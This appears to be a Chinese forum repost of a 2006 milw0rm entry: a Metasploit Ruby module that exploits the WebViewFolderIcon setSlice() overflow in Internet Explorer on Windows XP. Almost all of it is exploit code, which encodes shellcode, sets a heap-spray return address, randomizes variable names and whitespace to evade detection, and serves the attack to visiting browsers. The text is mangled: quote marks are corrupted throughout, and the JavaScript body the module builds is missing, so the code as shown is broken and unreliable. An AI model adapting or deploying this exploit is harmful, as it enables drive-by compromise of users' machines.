返回列表 发帖

MS Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit

This module is part of the metasploit framework3 # svn co http://metasploit.com/svn/framework3/trunk/ require ';msf/core'; module Msf class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote include Exploit::Remote::HttpServer::Html def initialize(info = {}) super(update_info(info, ';Name'; => ';Internet Explorer WebViewFolderIcon setSlice() Overflow';, ';Description'; => %q{ This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project (MoBB #18). }, ';License'; => MSF_LICENSE, ';Author'; => [ ';hdm';, ], ';Version'; => ';$Revision: 3783 $';, ';References'; => [ [ ';OSVDB';, ';27110'; ], [ ';BID';, ';19030'; ], [ ';URL';, ';http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html'; ] ], ';Payload'; => { ';Space'; => 1024, ';BadChars'; => "\x00", }, ';Platform'; => ';win';, ';Targets'; => [ [';Windows XP SP0-SP2 / IE 6.0SP1 English';, {';Ret'; => 0x0c0c0c0c} ] ], ';DefaultTarget'; => 0)) end def autofilter false end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Get a unicode friendly version of the return address addr_word = [target.ret].pack(';V';).unpack(';H*';)[0][0,4] # Randomize the javascript variable names var_buffer = Rex::Text.rand_text_alpha(rand(30)+2) var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2) var_unescape = Rex::Text.rand_text_alpha(rand(30)+2) var_x = Rex::Text.rand_text_alpha(rand(30)+2) var_i = Rex::Text.rand_text_alpha(rand(30)+2) var_tic = Rex::Text.rand_text_alpha(rand(30)+2) var_toc = Rex::Text.rand_text_alpha(rand(30)+2) # Randomize HTML data html = Rex::Text.rand_text_alpha(rand(30)+2) # Build out the message content = %Q| #{html} | # Randomize the whitespace in the document content.gsub!(/\s+/) do |s| len = rand(100)+2 set = "\x09\x20\x0d\x0a" buf = ';'; while (buf.length < len) buf << set[rand(set.length)].chr end buf end print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response(cli, content) end end end # milw0rm.com [2006-09-27]

返回列表 回复 发帖